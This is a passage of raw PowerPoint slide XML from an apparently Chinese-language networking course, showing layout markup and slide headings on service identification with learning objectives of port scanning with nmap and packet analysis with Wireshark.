            <p:nvGrpSpPr>
              <p:cNvPr id="87" name="Group 27"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="5960997" y="2484779"/>
                <a:ext cx="1304471" cy="2341845"/>
                <a:chOff x="5960997" y="2484779"/>
                <a:chExt cx="1304471" cy="2341845"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="88" name="Group 29"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks noChangeAspect="1"/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm>
                  <a:off x="5960997" y="2484779"/>
                  <a:ext cx="1304471" cy="1802479"/>
                  <a:chOff x="3149600" y="2480384"/>
                  <a:chExt cx="1201204" cy="1660005"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="89" name="等腰三角形 51"/>
                  <p:cNvSpPr/>
                  <p:nvPr>
                    <p:custDataLst>
                      <p:tags r:id="rId6"/>
                    </p:custDataLst>
                  </p:nvPr>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm flipV="1">
                    <a:off x="3149600" y="3200883"/>
                    <a:ext cx="1201204" cy="939506"/>
                  </a:xfrm>
                  <a:prstGeom prst="triangle">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:gradFill>
                    <a:gsLst>
                      <a:gs pos="0">
                        <a:schemeClr val="accent3"/>
                      </a:gs>
                      <a:gs pos="100000">
                        <a:srgbClr val="EEECE1">
                          <a:lumMod val="90000"/>
                          <a:alpha val="0"/>
                        </a:srgbClr>
                      </a:gs>
                    </a:gsLst>
                    <a:lin ang="5400000" scaled="0"/>
                  </a:gradFill>
                  <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
                    <a:noFill/>
                    <a:prstDash val="solid"/>
                  </a:ln>
                  <a:effectLst/>
                </p:spPr>
                <p:txBody>
                  <a:bodyPr anchor="ctr"/>
                  <a:lstStyle/>
                  <a:p>
                    <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                      <a:spcBef>
                        <a:spcPts val="0"/>
                      </a:spcBef>
                      <a:spcAft>
                        <a:spcPts val="0"/>
                      </a:spcAft>
                      <a:defRPr/>
                    </a:pPr>
                    <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                      <a:solidFill>
                        <a:sysClr val="window" lastClr="FFFFFF"/>
                      </a:solidFill>
                      <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                      <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="90" name="矩形 52"/>
                  <p:cNvSpPr/>
                  <p:nvPr>
                    <p:custDataLst>
                      <p:tags r:id="rId7"/>
                    </p:custDataLst>
                  </p:nvPr>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm>
                    <a:off x="3630724" y="2480384"/>
                    <a:ext cx="720080" cy="720080"/>
                  </a:xfrm>
                  <a:prstGeom prst="rect">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:solidFill>
                    <a:schemeClr val="accent3"/>
                  </a:solidFill>
                  <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
                    <a:noFill/>
                    <a:prstDash val="solid"/>
                  </a:ln>
                  <a:effectLst>
                    <a:outerShdw blurRad="40000" dist="23000" dir="5400000" rotWithShape="0">
                      <a:srgbClr val="000000">
                        <a:alpha val="35000"/>
                      </a:srgbClr>
                    </a:outerShdw>
                  </a:effectLst>
                  <a:scene3d>
                    <a:camera prst="isometricOffAxis2Top">
                      <a:rot lat="19390491" lon="18812960" rev="21592509"/>
                    </a:camera>
                    <a:lightRig rig="chilly" dir="t">
                      <a:rot lat="0" lon="0" rev="600000"/>
                    </a:lightRig>
                  </a:scene3d>
                  <a:sp3d extrusionH="666750"/>
                </p:spPr>
                <p:txBody>
                  <a:bodyPr anchor="ctr"/>
                  <a:lstStyle/>
                  <a:p>
                    <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                      <a:spcBef>
                        <a:spcPts val="0"/>
                      </a:spcBef>
                      <a:spcAft>
                        <a:spcPts val="0"/>
                      </a:spcAft>
                      <a:defRPr/>
                    </a:pPr>
                    <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                      <a:solidFill>
                        <a:sysClr val="window" lastClr="FFFFFF"/>
                      </a:solidFill>
                      <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                      <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
            </p:grpSp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="91" name="Oval 30"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr>
                  <p:custDataLst>
                    <p:tags r:id="rId8"/>
                  </p:custDataLst>
                </p:nvPr>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="6312532" y="4240732"/>
                  <a:ext cx="585892" cy="585892"/>
                </a:xfrm>
                <a:prstGeom prst="ellipse">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ln w="3810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id-ID"/>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="92" name="AutoShape 112"/>
              <p:cNvSpPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId9"/>
                </p:custDataLst>
              </p:nvPr>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6453017" y="4367800"/>
                <a:ext cx="328308" cy="328869"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T1" fmla="*/ 10800 h 21600"/>
                  <a:gd name="T2" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T3" fmla="*/ 10800 h 21600"/>
                  <a:gd name="T4" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T5" fmla="*/ 10800 h 21600"/>
                  <a:gd name="T6" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T7" fmla="*/ 10800 h 21600"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="0">
                    <a:pos x="T0" y="T1"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T2" y="T3"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T4" y="T5"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T6" y="T7"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="0" t="0" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="21020" h="21600">
                    <a:moveTo>
                      <a:pt x="18846" y="7946"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="17740" y="9091"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="17740" y="8939"/>
                      <a:pt x="17758" y="8792"/>
                      <a:pt x="17744" y="8636"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="17629" y="7331"/>
                      <a:pt x="17036" y="6068"/>
                      <a:pt x="16074" y="5080"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15004" y="3980"/>
                      <a:pt x="13585" y="3348"/>
                      <a:pt x="12180" y="3345"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="13268" y="2218"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="13812" y="1659"/>
                      <a:pt x="14572" y="1350"/>
                      <a:pt x="15403" y="1350"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="16460" y="1350"/>
                      <a:pt x="17546" y="1840"/>
                      <a:pt x="18381" y="2696"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19165" y="3500"/>
                      <a:pt x="19631" y="4499"/>
                      <a:pt x="19698" y="5510"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19760" y="6453"/>
                      <a:pt x="19457" y="7317"/>
                      <a:pt x="18846" y="7946"/>
                    </a:cubicBezTo>
                    <a:moveTo>
                      <a:pt x="5828" y="19329"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="5813" y="18424"/>
                      <a:pt x="5454" y="17481"/>
                      <a:pt x="4730" y="16739"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4046" y="16034"/>
                      <a:pt x="3150" y="15628"/>
                      <a:pt x="2257" y="15592"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="2911" y="13157"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="2959" y="12995"/>
                      <a:pt x="3052" y="12835"/>
                      <a:pt x="3168" y="12695"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4485" y="11726"/>
                      <a:pt x="6512" y="12012"/>
                      <a:pt x="7920" y="13460"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9409" y="14990"/>
                      <a:pt x="9639" y="17230"/>
                      <a:pt x="8492" y="18568"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8416" y="18609"/>
                      <a:pt x="8339" y="18648"/>
                      <a:pt x="8256" y="18675"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8256" y="18675"/>
                      <a:pt x="5828" y="19329"/>
                      <a:pt x="5828" y="19329"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="2737" y="20164"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="2665" y="20181"/>
                      <a:pt x="2443" y="20239"/>
                      <a:pt x="2291" y="20249"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1751" y="20244"/>
                      <a:pt x="1313" y="19792"/>
                      <a:pt x="1313" y="19237"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1321" y="19124"/>
                      <a:pt x="1365" y="18929"/>
                      <a:pt x="1380" y="18857"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="2071" y="16283"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="2822" y="16261"/>
                      <a:pt x="3630" y="16562"/>
                      <a:pt x="4265" y="17215"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4911" y="17878"/>
                      <a:pt x="5214" y="18725"/>
                      <a:pt x="5181" y="19504"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5181" y="19504"/>
                      <a:pt x="2737" y="20164"/>
                      <a:pt x="2737" y="20164"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="6888" y="11179"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="6280" y="10927"/>
                      <a:pt x="5642" y="10783"/>
                      <a:pt x="5004" y="10774"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="10063" y="5536"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="10838" y="4759"/>
                      <a:pt x="11966" y="4536"/>
                      <a:pt x="13077" y="4819"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="13077" y="4819"/>
                      <a:pt x="6888" y="11179"/>
                      <a:pt x="6888" y="11179"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="9717" y="13672"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="9473" y="13258"/>
                      <a:pt x="9194" y="12859"/>
                      <a:pt x="8848" y="12505"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8447" y="12093"/>
                      <a:pt x="7986" y="11770"/>
                      <a:pt x="7507" y="11498"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="13767" y="5064"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="14259" y="5288"/>
                      <a:pt x="14729" y="5607"/>
                      <a:pt x="15145" y="6035"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15500" y="6398"/>
                      <a:pt x="15775" y="6806"/>
                      <a:pt x="15987" y="7229"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15987" y="7229"/>
                      <a:pt x="9717" y="13672"/>
                      <a:pt x="9717" y="13672"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="10519" y="16061"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="10465" y="15452"/>
                      <a:pt x="10298" y="14854"/>
                      <a:pt x="10047" y="14288"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="16257" y="7906"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="16637" y="9140"/>
                      <a:pt x="16442" y="10429"/>
                      <a:pt x="15610" y="11284"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15604" y="11290"/>
                      <a:pt x="15598" y="11293"/>
                      <a:pt x="15593" y="11298"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="15602" y="11306"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10525" y="16565"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="10527" y="16397"/>
                      <a:pt x="10534" y="16232"/>
                      <a:pt x="10519" y="16061"/>
                    </a:cubicBezTo>
                    <a:moveTo>
                      <a:pt x="19308" y="1741"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="18228" y="632"/>
                      <a:pt x="16805" y="0"/>
                      <a:pt x="15403" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14220" y="0"/>
                      <a:pt x="13131" y="450"/>
                      <a:pt x="12335" y="1266"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="9138" y="4577"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="9129" y="4585"/>
                      <a:pt x="9118" y="4592"/>
                      <a:pt x="9108" y="4602"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9103" y="4608"/>
                      <a:pt x="9100" y="4614"/>
                      <a:pt x="9095" y="4620"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="9096" y="4621"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2310" y="11647"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="1998" y="11966"/>
                      <a:pt x="1771" y="12364"/>
                      <a:pt x="1645" y="12797"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="102" y="18541"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="18557"/>
                      <a:pt x="0" y="19008"/>
                      <a:pt x="0" y="19237"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="20541"/>
                      <a:pt x="1030" y="21599"/>
                      <a:pt x="2302" y="21599"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2554" y="21599"/>
                      <a:pt x="3044" y="21475"/>
                      <a:pt x="3062" y="21473"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="8630" y="19969"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="9054" y="19839"/>
                      <a:pt x="9439" y="19604"/>
                      <a:pt x="9750" y="19283"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="19776" y="8899"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="21600" y="7023"/>
                      <a:pt x="21394" y="3881"/>
                      <a:pt x="19308" y="1741"/>
                    </a:cubicBezTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solid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sp>
          <p:nvSpPr>
            <p:cNvPr id="94" name="Text Placeholder 3"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId10"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="16635" y="6800"/>
              <a:ext cx="1600" cy="484"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr" anchorCtr="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle>
              <a:defPPr>
                <a:defRPr lang="zh-CN"/>
              </a:defPPr>
              <a:lvl1pPr marL="0" indent="0" algn="ctr" defTabSz="1216025">
                <a:spcBef>
                  <a:spcPct val="20000"/>
                </a:spcBef>
                <a:buNone/>
                <a:defRPr sz="2000" b="1" baseline="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="65000"/>
                      <a:lumOff val="35000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:defRPr>
              </a:lvl1pPr>
              <a:lvl2pPr marL="457200" indent="0">
                <a:buNone/>
                <a:defRPr sz="1200"/>
              </a:lvl2pPr>
              <a:lvl3pPr marL="914400" indent="0">
                <a:buNone/>
                <a:defRPr sz="1000"/>
              </a:lvl3pPr>
              <a:lvl4pPr marL="1371600" indent="0">
                <a:buNone/>
                <a:defRPr sz="900"/>
              </a:lvl4pPr>
              <a:lvl5pPr marL="1828800" indent="0">
                <a:buNone/>
                <a:defRPr sz="900"/>
              </a:lvl5pPr>
              <a:lvl6pPr indent="0">
                <a:buNone/>
                <a:defRPr sz="900"/>
              </a:lvl6pPr>
              <a:lvl7pPr indent="0">
                <a:buNone/>
                <a:defRPr sz="900"/>
              </a:lvl7pPr>
              <a:lvl8pPr indent="0">
                <a:buNone/>
                <a:defRPr sz="900"/>
              </a:lvl8pPr>
              <a:lvl9pPr indent="0">
                <a:buNone/>
                <a:defRPr sz="900"/>
              </a:lvl9pPr>
            </a:lstStyle>
            <a:p>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                <a:t>项目评价</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48" name="文本框 47"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4505325" y="1420495"/>
            <a:ext cx="2266950" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:style>
          <a:lnRef idx="2">
            <a:schemeClr val="dk1"/>
          </a:lnRef>
          <a:fillRef idx="1">
            <a:schemeClr val="lt1"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="dk1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="dk1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>学习路径</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="矩形 50"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId11"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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52" name="矩形 51"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId12"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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53" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId13"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="3431540" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.2.4 服务识别</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:random/>
  </p:transition>
  <p:timing>
    <p:tnLst>
      <p:par>
        <p:cTn id="1" dur="indefinite" restart="never" nodeType="tmRoot"/>
      </p:par>
    </p:tnLst>
  </p:timing>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p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="标题 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【学习目标】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="7602220" cy="1362075"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>1.能够掌握nmap工具进行端口扫描。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>2.能够使用Wirshark工具抓取数据包进行分析。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="矩形 6"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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8" name="矩形 7"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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9" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="3431540" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
